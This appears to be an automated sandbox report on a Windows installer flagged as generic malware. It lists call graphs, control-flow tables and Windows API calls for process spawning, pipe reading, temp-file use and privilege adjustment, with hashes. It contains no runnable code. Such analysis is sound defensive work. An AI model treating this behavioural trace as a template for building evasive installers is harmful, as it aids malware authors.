ReadFile 3637->3643 3638->3636 3639 403355 ReadFile 3639->3640 3640->3636 3640->3639 3641 405e91 WriteFile 3640->3641 3641->3640 3642 403249 GetTickCount 3642->3643 3643->3636 3643->3637 3643->3642 3644 40326e MulDiv wsprintfA 3643->3644 3646 405e91 WriteFile 3643->3646 3645 405378 24 API calls 3644->3645 3645->3643 3646->3643 3648 405e62 ReadFile 3647->3648 3649 403368 3648->3649 3649->3504 3650->3515 3652 4066bc PeekMessageA 3651->3652 3653 4066b2 DispatchMessageA 3652->3653 3654 402ed7 3652->3654 3653->3652 3654->3507 3655->3629 3657 403d16 3656->3657 3673 4061b5 wsprintfA 3657->3673 3659 403d87 3674 403dbb 3659->3674 3661 403ac2 3661->3536 3662 403d8c 3662->3661 3663 4062ea 17 API calls 3662->3663 3663->3662 3677 404320 3664->3677 3666 405494 3667 404320 SendMessageA 3666->3667 3668 4054a6 OleUninitialize 3667->3668 3668->3567 3669 40546d 3669->3666 3680 401389 3669->3680 3671->3532 3672->3538 3673->3659 3675 4062ea 17 API calls 3674->3675 3676 403dc9 SetWindowTextA 3675->3676 3676->3662 3678 404338 3677->3678 3679 404329 SendMessageA 3677->3679 3678->3669 3679->3678 3682 401390 3680->3682 3681 4013fe 3681->3669 3682->3681 3683 4013cb MulDiv SendMessageA 3682->3683 3683->3682 3685 4039b6 3684->3685 3686 403980 3685->3686 3687 4039bb FreeLibrary GlobalFree 3685->3687 3686->3587 3687->3686 3687->3687 4590 402733 4591 402a47 4590->4591 4592 40273a 4590->4592 4593 402c17 17 API calls 4592->4593 4594 402741 4593->4594 4595 402750 SetFilePointer 4594->4595 4595->4591 4596 402760 4595->4596 4598 4061b5 wsprintfA 4596->4598 4598->4591 4599 401e35 GetDC 4600 402c17 17 API calls 4599->4600 4601 401e47 GetDeviceCaps MulDiv ReleaseDC 4600->4601 4602 402c17 17 API calls 4601->4602 4603 401e78 4602->4603 4604 4062ea 17 API calls 4603->4604 4605 401eb5 CreateFontIndirectA 4604->4605 4606 402628 4605->4606 3688 6eac105a 3691 6eac1096 3688->3691 3764 6eac17c3 GetCurrentProcess GetModuleHandleA GetProcAddress 3691->3764 3694 6eac10e4 GetModuleFileNameA GlobalAlloc 3696 6eac1127 3694->3696 3695 6eac1221 GlobalAlloc 3697 6eac1238 3695->3697 3698 6eac112c CharPrevA 3696->3698 3699 6eac1146 3696->3699 3700 6eac1250 FindWindowExA FindWindowExA 3697->3700 3712 6eac126f 3697->3712 3698->3696 3698->3699 3701 6eac1166 GetTempFileNameA CopyFileA 3699->3701 3702 6eac1150 3699->3702 3700->3712 3705 6eac11ff lstrcatA lstrlenA 3701->3705 3706 6eac1196 CreateFileA CreateFileMappingA MapViewOfFile 3701->3706 3779 6eac1ac2 3702->3779 3705->3697 3708 6eac11cb UnmapViewOfFile 3706->3708 3709 6eac11f1 CloseHandle CloseHandle 3706->3709 3708->3709 3709->3705 3711 6eac1085 3713 6eac129b lstrcmpiA 3712->3713 3769 6eac1a82 3712->3769 3774 6eac18b9 lstrlenA 3712->3774 3713->3712 3714 6eac12b0 lstrcmpiA 3713->3714 3714->3712 3715 6eac12c0 3714->3715 3716 6eac12ef GetVersion 3715->3716 3717 6eac12c4 3715->3717 3718 6eac1364 3716->3718 3719 6eac1390 3716->3719 3720 6eac1ac2 2 API calls 3717->3720 3721 6eac136e 3718->3721 3722 6eac1373 GlobalAlloc 3718->3722 3723 6eac139d InitializeSecurityDescriptor SetSecurityDescriptorDacl 3719->3723 3724 6eac13c4 CreatePipe 3719->3724 3725 6eac12ce 3720->3725 3721->3722 3726 6eac138e 3722->3726 3727 6eac144a lstrcpyA 3722->3727 3723->3724 3724->3727 3728 6eac13dd CreatePipe 3724->3728 3730 6eac12de DeleteFileA 3725->3730 3731 6eac12e7 3725->3731 3726->3719 3729 6eac145c 3727->3729 3728->3727 3732 6eac13f0 GetStartupInfoA CreateProcessA 3728->3732 3733 6eac146a 3729->3733 3734 6eac1464 3729->3734 3730->3731 3731->3716 3732->3727 3735 6eac151c GetTickCount 3732->3735 3737 6eac147e 3733->3737 3739 6eac1473 3733->3739 3736 6eac1ac2 2 API calls 3734->3736 3738 6eac152a WaitForSingleObject GetExitCodeProcess 3735->3738 3736->3733 3741 6eac1499 3737->3741 3742 6eac1487 lstrcpyA 3737->3742 3740 6eac1544 PeekNamedPipe 3738->3740 3782 6eac183d 3739->3782 3744 6eac172e 3740->3744 3745 6eac155e GetTickCount ReadFile 3740->3745 3746 6eac14b9 3741->3746 3747 6eac14a1 wsprintfA 3741->3747 3742->3741 3744->3729 3750 6eac173e GetTickCount 3744->3750 3751 6eac176f Sleep 3744->3751 3760 6eac159a 3745->3760 3749 6eac1ac2 2 API calls 3746->3749 3747->3746 3752 6eac14c5 6 API calls 3749->3752 3750->3751 3753 6eac174d TerminateProcess lstrcpyA 3750->3753 3751->3738 3754 6eac14f4 3752->3754 3753->3738 3755 6eac14fc DeleteFileA 3754->3755 3756 6eac1505 GlobalFree 3754->3756 3755->3756 3756->3711 3757 6eac1514 GlobalFree 3756->3757 3757->3711 3758 6eac1652 lstrcpyA 3758->3760 3759 6eac16be GlobalReAlloc 3759->3760 3761 6eac1710 lstrcpyA 3759->3761 3760->3738 3760->3740 3760->3758 3760->3759 3763 6eac183d 5 API calls 3760->3763 3787 6eac1784 3760->3787 3761->3738 3763->3760 3765 6eac17ff 3764->3765 3766 6eac1819 GetProcAddress 3764->3766 3765->3766 3767 6eac10dc 3765->3767 3766->3767 3768 6eac1828 3766->3768 3767->3694 3767->3695 3768->3767 3770 6eac1a8c 3769->3770 3771 6eac1abb 3769->3771 3770->3771 3772 6eac1aac GlobalFree 3770->3772 3773 6eac1a99 lstrcpyA 3770->3773 3771->3712 3772->3771 3773->3772 3775 6eac18fa lstrlenA 3774->3775 3776 6eac18d3 lstrcmpiA 3775->3776 3778 6eac1902 3775->3778 3777 6eac18f1 CharNextA 3776->3777 3776->3778 3777->3775 3778->3712 3780 6eac1acb GlobalAlloc lstrcpynA 3779->3780 3781 6eac115a GlobalFree 3779->3781 3780->3781 3781->3711 3783 6eac184e 3782->3783 3784 6eac147c 3782->3784 3785 6eac1869 SendMessageA SendMessageA SendMessageA 3783->3785 3786 6eac1859 lstrlenA OemToCharBuffA 3783->3786 3784->3737 3785->3784 3786->3785 3788 6eac178f CharNextExA 3787->3788 3789 6eac17bd 3787->3789 3788->3789 3789->3760 3790 4054b6 3791 405661 3790->3791 3792 4054d8 GetDlgItem GetDlgItem GetDlgItem 3790->3792 3794 405691 3791->3794 3795 405669 GetDlgItem CreateThread FindCloseChangeNotification 3791->3795 3836 404309 SendMessageA 3792->3836 3796 4056bf 3794->3796 3798 4056e0 3794->3798 3799 4056a7 ShowWindow ShowWindow 3794->3799 3795->3794 3859 40544a 5 API calls 3795->3859 3800 4056c7 3796->3800 3801 40571a 3796->3801 3797 405548 3803 40554f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3797->3803 3845 40433b 3798->3845 3841 404309 SendMessageA 3799->3841 3805 4056f3 ShowWindow 3800->3805 3806 4056cf 3800->3806 3801->3798 3812 405727 SendMessageA 3801->3812 3810 4055a1 SendMessageA SendMessageA 3803->3810 3811 4055bd 3803->3811 3808 405713 3805->3808 3809 405705 3805->3809 3842 4042ad 3806->3842 3807 4056ec 3815 4042ad SendMessageA 3808->3815 3814 405378 24 API calls 3809->3814 3810->3811 3816 4055d0 3811->3816 3817 4055c2 SendMessageA 3811->3817 3812->3807 3818 405740 CreatePopupMenu 3812->3818 3814->3808 3815->3801 3837 4042d4 3816->3837 3817->3816 3819 4062ea 17 API calls 3818->3819 3821 405750 AppendMenuA 3819->3821 3823 405781 TrackPopupMenu 3821->3823 3824 40576e GetWindowRect 3821->3824 3822 4055e0 3825 4055e9 ShowWindow 3822->3825 3826 40561d GetDlgItem SendMessageA 3822->3826 3823->3807 3827 40579d 3823->3827 3824->3823 3828 40560c 3825->3828 3829 4055ff ShowWindow 3825->3829 3826->3807 3830 405644 SendMessageA SendMessageA 3826->3830 3831 4057bc SendMessageA 3827->3831 3840 404309 SendMessageA 3828->3840 3829->3828 3830->3807 3831->3831 3832 4057d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3831->3832 3834 4057fb SendMessageA 3832->3834 3834->3834 3835 40581d GlobalUnlock SetClipboardData CloseClipboard 3834->3835 3835->3807 3836->3797 3838 4062ea 17 API calls 3837->3838 3839 4042df SetDlgItemTextA 3838->3839 3839->3822 3840->3826 3841->3796 3843 4042b4 3842->3843 3844 4042ba SendMessageA 3842->3844 3843->3844 3844->3798 3846 4043fe 3845->3846 3847 404353 GetWindowLongA 3845->3847 3846->3807 3847->3846 3848 404368 3847->3848 3848->3846 3849 404395 GetSysColor 3848->3849 3850 404398 3848->3850 3849->3850 3851 4043a8 SetBkMode 3850->3851 3852 40439e SetTextColor 3850->3852 3853 4043c0 GetSysColor 3851->3853 3854 4043c6 3851->3854 3852->3851 3853->3854 3855 4043d7 3854->3855 3856 4043cd SetBkColor 3854->3856 3855->3846 3857 4043f1 CreateBrushIndirect 3855->3857 3858 4043ea DeleteObject 3855->3858 3856->3855 3857->3846 3858->3857 4607 404ab7 4608 404ae3 4607->4608 4609 404ac7 4607->4609 4611 404b16 4608->4611 4612 404ae9 SHGetPathFromIDListA 4608->4612 4618 405951 GetDlgItemTextA 4609->4618 4614 404b00 SendMessageA 4612->4614 4615 404af9 4612->4615 4613 404ad4 SendMessageA 4613->4608 4614->4611 4616 40140b 2 API calls 4615->4616 4616->4614 4618->4613 4619 4014b7 4620 4014bd 4619->4620 4621 401389 2 API calls 4620->4621 4622 4014c5 4621->4622 3977 4015bb 3978 402c39 17 API calls 3977->3978 3979 4015c2 3978->3979 3980 405c82 4 API calls 3979->3980 3985 4015ca 3980->3985 3981 401624 3983 401652 3981->3983 3984 401629 3981->3984 3982 405c14 CharNextA 3982->3985 3988 401423 24 API calls 3983->3988 3986 401423 24 API calls 3984->3986 3985->3981 3985->3982 3990 4058bb 2 API calls 3985->3990 3991 4058d8 5 API calls 3985->3991 3994 40160c GetFileAttributesA 3985->3994 3995 40583e 4 API calls 3985->3995 3987 401630 3986->3987 3996 406257 lstrcpynA 3987->3996 3993 40164a 3988->3993 3990->3985 3991->3985 3992 40163b SetCurrentDirectoryA 3992->3993 3994->3985 3995->3985 3996->3992 4623 4016bb 4624 402c39 17 API calls 4623->4624 4625 4016c1 GetFullPathNameA 4624->4625 4626 4016d8 4625->4626 4627 4016f9 4625->4627 4626->4627 4630 4065ce 2 API calls 4626->4630 4628 402ac5 4627->4628 4629 40170d GetShortPathNameA 4627->4629 4629->4628 4631 4016e9 4630->4631 4631->4627 4633 406257 lstrcpynA 4631->4633 4633->4627 4634 402abe InvalidateRect 4635 402ac5 4634->4635 4636 40443f 4637 404455 4636->4637 4645 404561 4636->4645 4639 4042d4 18 API calls 4637->4639 4638 4045d0 4640 40469a 4638->4640 4641 4045da GetDlgItem 4638->4641 4642 4044ab 4639->4642 4647 40433b 8 API calls 4640->4647 4643 4045f0 4641->4643 4644 404658 4641->4644 4646 4042d4 18 API calls 4642->4646 4643->4644 4650 404616 SendMessageA LoadCursorA SetCursor 4643->4650 4644->4640 4651 40466a 4644->4651 4645->4638 4645->4640 4648 4045a5 GetDlgItem SendMessageA 4645->4648 4649 4044b8 CheckDlgButton 4646->4649 4661 404695 4647->4661 4669 4042f6 KiUserCallbackDispatcher 4648->4669 4667 4042f6 KiUserCallbackDispatcher 4649->4667 4670 4046e3 4650->4670 4656 404670 SendMessageA 4651->4656 4657 404681 4651->4657 4653 4045cb 4658 4046bf SendMessageA 4653->4658 4656->4657 4657->4661 4662 404687 SendMessageA 4657->4662 4658->4638 4659 4044d6 GetDlgItem 4668 404309 SendMessageA 4659->4668 4662->4661 4664 4044ec SendMessageA 4665 404513 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4664->4665 4666 40450a GetSysColor 4664->4666 4665->4661 4666->4665 4667->4659 4668->4664 4669->4653 4673 405933 ShellExecuteExA 4670->4673 4672 404649 LoadCursorA SetCursor 4672->4644 4673->4672

                                                                        Executed Functions

                                                                        Function 6EAC1096 Relevance: 109.1, APIs: 53, Strings: 9, Instructions: 581filestringmemoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 6eac1096-6eac10de call 6eac17c3 3 6eac10e4-6eac1124 GetModuleFileNameA GlobalAlloc 0->3 4 6eac1221-6eac1235 GlobalAlloc 0->4 5 6eac1127-6eac112a 3->5 6 6eac1238-6eac124e 4->6 7 6eac112c-6eac1144 CharPrevA 5->7 8 6eac1146-6eac114e 5->8 9 6eac126f 6->9 10 6eac1250-6eac126a FindWindowExA * 2 6->10 7->5 7->8 12 6eac1166-6eac1194 GetTempFileNameA CopyFileA 8->12 13 6eac1150-6eac1161 call 6eac1ac2 GlobalFree 8->13 11 6eac1275-6eac128a call 6eac1a82 call 6eac18b9 9->11 10->9 25 6eac128c-6eac1299 call 6eac190d 11->25 26 6eac129b-6eac12a5 lstrcmpiA 11->26 16 6eac11ff-6eac121f lstrcatA lstrlenA 12->16 17 6eac1196-6eac11c9 CreateFileA CreateFileMappingA MapViewOfFile 12->17 23 6eac1517-6eac151b 13->23 16->6 20 6eac11cb-6eac11eb UnmapViewOfFile 17->20 21 6eac11f1-6eac11f9 CloseHandle * 2 17->21 20->21 21->16 31 6eac12bc-6eac12be 25->31 28 6eac12a7-6eac12ae 26->28 29 6eac12b0-6eac12ba lstrcmpiA 26->29 28->31 29->31 32 6eac12c0-6eac12c2 29->32 31->11 33 6eac12ef-6eac1362 GetVersion 32->33 34 6eac12c4-6eac12d4 call 6eac1ac2 32->34 35 6eac1364-6eac136c 33->35 36 6eac1390-6eac139b 33->36 43 6eac12d9-6eac12dc 34->43 44 6eac12d6 34->44 38 6eac136e 35->38 39 6eac1373-6eac1388 GlobalAlloc 35->39 40 6eac139d-6eac13c1 InitializeSecurityDescriptor SetSecurityDescriptorDacl 36->40 41 6eac13c4-6eac13db CreatePipe 36->41 38->39 45 6eac138e 39->45 46 6eac144a-6eac1456 lstrcpyA 39->46 40->41 41->46 47 6eac13dd-6eac13ee CreatePipe 41->47 49 6eac12de-6eac12e1 DeleteFileA 43->49 50 6eac12e7 43->50 44->43 45->36 48 6eac145c-6eac1462 46->48 47->46 51 6eac13f0-6eac1444 GetStartupInfoA CreateProcessA 47->51 52 6eac146a-6eac146d 48->52 53 6eac1464-6eac1465 call 6eac1ac2 48->53 49->50 50->33 51->46 54 6eac151c-6eac1525 GetTickCount 51->54 56 6eac147e-6eac1485 52->56 57 6eac146f-6eac1471 52->57 53->52 58 6eac152a-6eac153e WaitForSingleObject GetExitCodeProcess 54->58 61 6eac1499-6eac149f 56->61 62 6eac1487-6eac1493 lstrcpyA 56->62 57->56 59 6eac1473-6eac147d call 6eac183d 57->59 60 6eac1544-6eac1558 PeekNamedPipe 58->60 59->56 64 6eac172e-6eac1731 60->64 65 6eac155e-6eac1598 GetTickCount ReadFile 60->65 66 6eac14b9-6eac14f2 call 6eac1ac2 CloseHandle * 6 61->66 67 6eac14a1-6eac14b6 wsprintfA 61->67 62->61 64->48 69 6eac1737-6eac173c 64->69 70 6eac159a-6eac159e 65->70 71 6eac1603-6eac1606 65->71 83 6eac14f4 66->83 84 6eac14f7-6eac14fa 66->84 67->66 73 6eac173e-6eac174b GetTickCount 69->73 74 6eac176f-6eac1777 Sleep 69->74 70->71 75 6eac15a0-6eac15a9 70->75 76 6eac177c-6eac177f 71->76 77 6eac160c-6eac160f 71->77 73->74 79 6eac174d-6eac176a TerminateProcess lstrcpyA 73->79 74->58 80 6eac15ab-6eac15ad 75->80 81 6eac15b7-6eac15bf 75->81 76->58 77->58 82 6eac1615-6eac161b 77->82 79->58 80->81 87 6eac15af-6eac15b5 80->87 89 6eac15cd 81->89 90 6eac15c1-6eac15c7 81->90 88 6eac161e-6eac1626 82->88 83->84 85 6eac14fc-6eac14ff DeleteFileA 84->85 86 6eac1505-6eac1512 GlobalFree 84->86 85->86 86->23 92 6eac1514-6eac1515 GlobalFree 86->92 87->81 93 6eac15f0 87->93 88->60 94 6eac162c-6eac162f 88->94 91 6eac15d0-6eac15d3 89->91 90->89 95 6eac15c9-6eac15cb 90->95 97 6eac15fe 91->97 98 6eac15d5-6eac15d8 91->98 92->23 96 6eac15f5-6eac15fc 93->96 99 6eac163c-6eac1646 94->99 100 6eac1631-6eac1635 94->100 95->89 95->96 96->91 105 6eac1600 97->105 98->97 104 6eac15da-6eac15e1 98->104 102 6eac1648-6eac164b 99->102 103 6eac166a-6eac166c 99->103 100->88 101 6eac1637 100->101 101->60 106 6eac164d-6eac1650 102->106 107 6eac1694-6eac1697 102->107 109 6eac166e-6eac1671 103->109 110 6eac1673-6eac1675 103->110 104->97 108 6eac15e3-6eac15e9 104->108 105->71 111 6eac16b9-6eac16bc 106->111 112 6eac1652-6eac1668 lstrcpyA 106->112 107->111 116 6eac1699 107->116 108->97 113 6eac15eb-6eac15ee 108->113 109->110 114 6eac16ae-6eac16b4 109->114 110->107 115 6eac1677-6eac167a 110->115 117 6eac16be-6eac16d3 GlobalReAlloc 111->117 118 6eac16ea-6eac170b call 6eac1784 111->118 112->114 113->105 114->88 115->107 119 6eac167c-6eac1692 call 6eac183d 115->119 120 6eac169b-6eac16ac 116->120 121 6eac16d5-6eac16e5 117->121 122 6eac1710-6eac1729 lstrcpyA 117->122 118->58 119->114 120->114 120->120 121->82 122->58
                                                                        APIs
                                                                          • Part of subcall function 6EAC17C3: GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6EAC10DC), ref: 6EAC17CC
                                                                          • Part of subcall function 6EAC17C3: GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6EAC10DC), ref: 6EAC17DA
                                                                          • Part of subcall function 6EAC17C3: GetProcAddress.KERNEL32(00000000,?), ref: 6EAC17F9
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104), ref: 6EAC10F6
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6EAC110C
                                                                        • CharPrevA.USER32(?,?), ref: 6EAC1134
                                                                        • GlobalFree.KERNEL32(00000000), ref: 6EAC115B
                                                                        • GetTempFileNameA.KERNEL32(?,6EAC3050,00000000,?), ref: 6EAC1178
                                                                        • CopyFileA.KERNEL32(?,?,00000000), ref: 6EAC118C
                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 6EAC11A4
                                                                        • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 6EAC11B3
                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 6EAC11C1
                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 6EAC11EB
                                                                        • CloseHandle.KERNEL32(00000000), ref: 6EAC11F2
                                                                        • CloseHandle.KERNEL32(00000000), ref: 6EAC11F9
                                                                        • lstrcatA.KERNEL32(?,6EAC304C), ref: 6EAC1207
                                                                        • lstrlenA.KERNEL32(?), ref: 6EAC1210
                                                                        • GlobalAlloc.KERNEL32(00000040,00000401), ref: 6EAC122D
                                                                        • FindWindowExA.USER32(0001046E,00000000,#32770,00000000), ref: 6EAC1265
                                                                        • FindWindowExA.USER32(00000000), ref: 6EAC1268
                                                                        • lstrcmpiA.KERNEL32(00000000,/OEM), ref: 6EAC12A1
                                                                        • lstrcmpiA.KERNEL32(00000000,/MBCS), ref: 6EAC12B6
                                                                        • DeleteFileA.KERNEL32(?,error), ref: 6EAC12E1
                                                                        • GetVersion.KERNEL32 ref: 6EAC1327
                                                                        • GlobalAlloc.KERNEL32(00000040,00000401), ref: 6EAC137A
                                                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 6EAC13A5
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 6EAC13B5
                                                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6EAC13D7
                                                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6EAC13EA
                                                                        • GetStartupInfoA.KERNEL32(00000044), ref: 6EAC13F7
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 6EAC143C
                                                                        • lstrcpyA.KERNEL32(?,error), ref: 6EAC1456
                                                                        • lstrcpyA.KERNEL32(?,error), ref: 6EAC1493
                                                                        • wsprintfA.USER32 ref: 6EAC14B0
                                                                        • CloseHandle.KERNEL32(?,?), ref: 6EAC14CE
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC14D3
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC14D8
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC14DD
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC14E2
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC14E7
                                                                        • DeleteFileA.KERNEL32(?), ref: 6EAC14FF
                                                                        • GlobalFree.KERNEL32(?), ref: 6EAC150E
                                                                        • GlobalFree.KERNEL32(00000002), ref: 6EAC1515
                                                                        • GetTickCount.KERNEL32 ref: 6EAC151C
                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 6EAC152E
                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 6EAC153E
                                                                        • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 6EAC154F
                                                                        • GetTickCount.KERNEL32 ref: 6EAC155E
                                                                        • ReadFile.KERNEL32(?,?,00000400,?,00000000), ref: 6EAC157E
                                                                        • lstrcpyA.KERNEL32(?, ), ref: 6EAC165A
                                                                        • GlobalReAlloc.KERNEL32(00000002,?,00000042), ref: 6EAC16CB
                                                                        • lstrcpyA.KERNEL32(?,error), ref: 6EAC171C
                                                                        • GetTickCount.KERNEL32 ref: 6EAC173E
                                                                        • TerminateProcess.KERNEL32(?,000000FF), ref: 6EAC1752
                                                                        • lstrcpyA.KERNEL32(?,timeout), ref: 6EAC1764
                                                                        • Sleep.KERNELBASE(00000064), ref: 6EAC1771
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$Handle$Close$Global$Createlstrcpy$AllocProcess$CountFreePipeTick$DeleteDescriptorFindModuleNameSecurityViewWindowlstrcmpi$AddressCharCodeCopyCurrentDaclExitInfoInitializeMappingNamedObjectPeekPrevProcReadSingleSleepStartupTempTerminateUnmapVersionWaitlstrcatlstrlenwsprintf
                                                                        • String ID: $#32770$/MBCS$/OEM$/TIMEOUT=$D$SysListView32$error$timeout
                                                                        • API String ID: 2662719652-2772347907
                                                                        • Opcode ID: 8630946eadece29039f570012307b1d60038c26d92e6560c7916c8f02caa9856
                                                                        • Instruction ID: 6e4aaeaf3364986e650eaa38d23760f4b359dfea829f91911731852bbfaa3a0c
                                                                        • Opcode Fuzzy Hash: 8630946eadece29039f570012307b1d60038c26d92e6560c7916c8f02caa9856
                                                                        • Instruction Fuzzy Hash: A7227C71E00649EFDF108FE4C888AEEBBB9BB15B05F1540AAE555B7200D7344D89CF6A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004033B3 Relevance: 94.9, APIs: 33, Strings: 21, Instructions: 417stringfilecomCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 127 4033b3-403403 SetErrorMode GetVersionExA 128 403444 127->128 129 403405-40341f GetVersionExA 127->129 131 40344b 128->131 130 403421-403440 129->130 129->131 130->128 132 40344d-403458 131->132 133 40346f-403476 131->133 134 40345a-403469 132->134 135 40346b 132->135 136 403480-4034c0 133->136 137 403478 133->137 134->133 135->133 138 4034c2-4034ca call 406663 136->138 139 4034d3 136->139 137->136 138->139 145 4034cc 138->145 140 4034d8-4034ec call 4065f5 lstrlenA 139->140 146 4034ee-40350a call 406663 * 3 140->146 145->139 153 40351b-40357b #17 OleInitialize SHGetFileInfoA call 406257 GetCommandLineA call 406257 146->153 154 40350c-403512 146->154 161 403586-403599 call 405c14 CharNextA 153->161 162 40357d-403581 153->162 154->153 159 403514 154->159 159->153 165 40365a-40365e 161->165 162->161 166 403664 165->166 167 40359e-4035a1 165->167 170 403678-403692 GetTempPathA call 403382 166->170 168 4035a3-4035a7 167->168 169 4035a9-4035b0 167->169 168->168 168->169 171 4035b2-4035b3 169->171 172 4035b7-4035ba 169->172 177 403694-4036b2 GetWindowsDirectoryA lstrcatA call 403382 170->177 178 4036ea-403702 DeleteFileA call 402f0c 170->178 171->172 174 4035c0-4035c4 172->174 175 40364b-403657 call 405c14 172->175 180 4035c6-4035cc 174->180 181 4035dc-403609 174->181 175->165 194 403659 175->194 177->178 195 4036b4-4036e4 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403382 177->195 196 403795-4037a6 call 403963 OleUninitialize 178->196 197 403708-40370e 178->197 187 4035d2 180->187 188 4035ce-4035d0 180->188 183 40361b-403649 181->183 184 40360b-403611 181->184 183->175 192 403666-403673 call 406257 183->192 190 403613-403615 184->190 191 403617 184->191 187->181 188->181 188->187 190->183 190->191 191->183 192->170 194->165 195->178 195->196 209 4037ac-4037bb call 40596d ExitProcess 196->209 210 4038cf-4038d5 196->210 200 403710-40371b call 405c14 197->200 201 403786-40378d call 403a3d 197->201 214 403751-40375a 200->214 215 40371d-403746 200->215 207 403792 201->207 207->196 212 4038d7-4038ec GetCurrentProcess OpenProcessToken 210->212 213 40394d-403955 210->213 221 40391d-40392b call 406663 212->221 222 4038ee-403917 LookupPrivilegeValueA AdjustTokenPrivileges 212->222 216 403957 213->216 217 40395a-40395d ExitProcess 213->217 219 4037c1-4037d5 call 4058d8 lstrcatA 214->219 220 40375c-40376a call 405cd7 214->220 223 403748-40374a 215->223 216->217 232 4037e2-4037fc lstrcatA lstrcmpiA 219->232 233 4037d7-4037dd lstrcatA 219->233 220->196 231 40376c-403782 call 406257 * 2 220->231 234 403939-403944 ExitWindowsEx 221->234 235 40392d-403937 221->235 222->221 223->214 227 40374c-40374f 223->227 227->214 227->223 231->201 232->196 237 4037fe-403801 232->237 233->232 234->213 238 403946-403948 call 40140b 234->238 235->234 235->238 240 403803-403808 call 40583e 237->240 241 40380a call 4058bb 237->241 238->213 249 40380f-40381d SetCurrentDirectoryA 240->249 241->249 250 40382a-403855 call 406257 249->250 251 40381f-403825 call 406257 249->251 255 40385b-403878 call 4062ea DeleteFileA 250->255 251->250 258 4038b8-4038c1 255->258 259 40387a-40388a CopyFileA 255->259 258->255 260 4038c3-4038ca call 406030 258->260 259->258 261 40388c-4038ac call 406030 call 4062ea call 4058f0 259->261 260->196 261->258 270 4038ae-4038b5 CloseHandle 261->270 270->258
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004033D6
                                                                        • GetVersionExA.KERNEL32(?), ref: 004033FF
                                                                        • GetVersionExA.KERNEL32(0000009C), ref: 00403416
                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034DF
                                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040351C
                                                                        • OleInitialize.OLE32(00000000), ref: 00403523
                                                                        • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403541
                                                                        • GetCommandLineA.KERNEL32(Drivelingly Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403556
                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000000,?,00000007,00000009,0000000B), ref: 00403590
                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403689
                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040369A
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036A6
                                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036BA
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036C2
                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036D3
                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036DB
